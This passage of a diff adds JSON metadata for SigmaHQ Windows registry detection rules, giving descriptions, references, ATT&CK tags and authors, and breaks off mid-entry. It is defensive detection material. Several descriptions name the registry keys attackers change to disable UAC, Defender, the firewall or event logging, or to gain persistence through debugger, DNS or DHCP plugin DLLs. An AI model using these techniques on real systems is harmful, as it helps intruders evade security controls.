+ }, + { + "description": "Detect the creation of a service with a service binary located in a uncommon directory", + "uuid": "277dc340-0540-42e7-8efb-5ff460045e07", + "value": "Service Binary in Uncommon Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/05/02", + "filename": "registry_set_creation_service_uncommon_folder.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the abuse of custom file open handler, executing powershell", + "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "value": "Custom File Open Handler Executes PowerShell", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/11", + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", + "author": "CD_R0M_", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "meta": { + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/05/13", + "filename": 
"registry_set_cve_2020_1048_new_printer_port.yml", + "author": "EagleEye Team, Florian Roth, NVISO", + "level": "high", + "falsepositive": [ + "New printer port install on host" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ], + "creation_date": "2021/07/16", + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", + "author": "Sittikorn S, frack113", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" + ], 
+ "tags": [ + "attack.defense_evasion", + "attack.t1221" + ], + "creation_date": "2020/05/31", + "filename": "registry_set_cve_2022_30190_msdt_follina.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", + "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "value": "Add Debugger Entry To DbgManagedDebugger For Persistence", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574" + ], + "creation_date": "2022/08/07", + "filename": "registry_set_dbgmanageddebugger_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "value": "Windows Defender Exclusions Added - Registry", + "meta": { + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/06", + "filename": "registry_set_defender_exclusions.yml", + "author": "Christian Burkard", + "level": "medium", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "value": "DHCP Callout DLL Installation", + "meta": { + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ], + "creation_date": "2017/05/15", + "filename": "registry_set_dhcp_calloutdll.yml", + "author": "Dimitrios Slamaris", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "uuid": 
"bf9e1387-b040-4393-9851-1598f8ecfae9", + "value": "Disable Exploit Guard Network Protection on Windows Defender", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/08/04", + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "value": "Disabled Windows Defender Eventlog", + "meta": { + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/07/04", + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender PUA protection", + "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "value": "Disable PUA Protection on Windows Defender", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/08/04", + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender Tamper Protection", + "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", + "value": "Disable Tamper Protection on Windows Defender", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/08/04", + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "value": "Disable Administrative Share Creation at Startup", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ], + "creation_date": "2022/01/16", + "filename": "registry_set_disable_administrative_share.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", + "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "value": "AutoLogger Sessions Tamper", + "meta": { + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_disable_autologger_sessions.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "value": "Disable Microsoft Defender Firewall via Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/01/09", 
+ "filename": "registry_set_disable_defender_firewall.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", + "value": "Disable Internal Tools or Feature in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/03/18", + "filename": "registry_set_disable_function_user.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", + "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "value": "Disable Macro Runtime Scan Scope", + "meta": { + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", + "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/10/25", + "filename": "registry_set_disable_macroruntimescanscope.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Disable Microsoft Office Security Features by registry", + "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", + "value": "Disable Microsoft Office Security Features", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/06/08", + "filename": "registry_set_disable_microsoft_office_security_features.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that disable Privacy Settings Experience", + "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "value": "Disable Privacy Settings Experience in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" + ], + "tags": [ 
+ "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/10/02", + "filename": "registry_set_disable_privacy_settings_experience.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "value": "Disable Windows Security Center Notifications", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_disable_security_center_notifications.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry to disable a system restore on the computer", + "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", + "value": "Registry Disable System Restore", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/04/04", + "filename": "registry_set_disable_system_restore.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "value": "Disable UAC Using Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/01/05", + "filename": "registry_set_disable_uac_registry.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "value": "Windows Defender Service Disabled", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_disable_windows_defender_service.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd, frack113, AlertIQ, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect 
set EnableFirewall to 0 to disable the windows firewall", + "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", + "value": "Disable Windows Firewall by Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_disable_windows_firewall.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "value": "Disable Winevt Event Logging Via Registry", + "meta": { + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889", + "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/07/04", + "filename": "registry_set_disable_winevt_logging.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate administrators disabling specific event log for troubleshooting" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "value": "Add DisallowRun Execution to Registry", + "meta": { + 
"refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_disallowrun_execution.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box [\u2026] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "value": "Persistence Via Disk Cleanup Handler - Autorun", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", + "author": "Nasreddine Bencherchali", + 
"level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "value": "DNS-over-HTTPS Enabled by Registry", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://github.com/elastic/detection-rules/issues/1371", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" + ], + "creation_date": "2021/07/22", + "filename": "registry_set_dns_over_https_enabled.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "value": "DNS ServerLevelPluginDll Install - Registry", + "meta": { + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + 
"attack.t1112" + ], + "creation_date": "2017/05/08", + "filename": "registry_set_dns_serverlevelplugindll.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "value": "Enabling COR Profiler Environment Variables", + "meta": { + "refs": [ + "https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", + "https://www.sans.org/cyber-security-summit/archives", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" + ], + "creation_date": "2020/09/10", + "filename": "registry_set_enabling_cor_profiler_env_variables.yml", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "value": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "meta": { + "refs": [ + "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/06/15", + "filename": 
"registry_set_enabling_turnoffcheck.yml", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "value": "COMPlus_ETWEnabled Registry Modification - Registry", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/06/05", + "filename": "registry_set_etw_disabled.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects 
applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "value": "Suspicious Application Allowed Through Exploit Guard", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/05", + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", + "value": "Change User Account Associated with the FAX Service", + "meta": { + "refs": [ + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/07/17", + "filename": "registry_set_fax_change_service_user.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect possible persistence using Fax DLL load when service restart", + "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "value": "Change the Fax Dll", + "meta": { + "refs": [ + 
